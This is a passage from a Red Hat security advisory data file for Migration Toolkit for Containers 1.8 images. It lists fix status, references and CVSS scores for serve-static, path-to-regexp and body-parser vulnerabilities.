"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", 